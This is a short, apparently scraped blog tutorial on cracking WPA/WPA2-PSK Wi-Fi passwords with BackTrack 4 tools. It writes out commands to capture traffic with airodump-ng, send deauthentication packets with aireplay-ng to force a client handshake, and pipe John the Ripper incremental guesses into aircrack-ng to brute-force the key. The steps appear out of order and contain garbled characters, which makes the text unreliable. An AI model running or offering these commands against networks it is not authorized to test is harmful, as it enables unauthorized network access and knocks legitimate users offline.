![]() CUDA will make the work more easier but it may also need years or so just depends. You are required to wait for hours or years for the cracking which is depends on how powerful your hardwares are and strength of the key. pentest/password/jtr/john -stdout -incremental:all | aircrack-ng -b 00:24:B2:A0:51:14 -w - output*.cap If not, do it again until you get the handshake. To get the handshake when done and then go to next step. Make sure the client is connecting to the wifi router when you are performing Step 1 to 4.Īirodump-ng -channel 5 -write output -bssid 00:24:B2:A0:51:14 mon0Īireplay-ng -deauth 10 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0 The following tutorial is based on Back|Track 4. I have a better solution to crack WPA/WPA2-PSK (in theory, it must success) but it requires hours to years to crack depending on the strength of the key and the speed of the hardwares. ![]() To crack WPA/WPA2-PSK requires the to be cracked key is in your dictionaries. At the moment, we need to use dictionaries to brute force the WPA/WPA-PSK.
0 Comments
Leave a Reply. |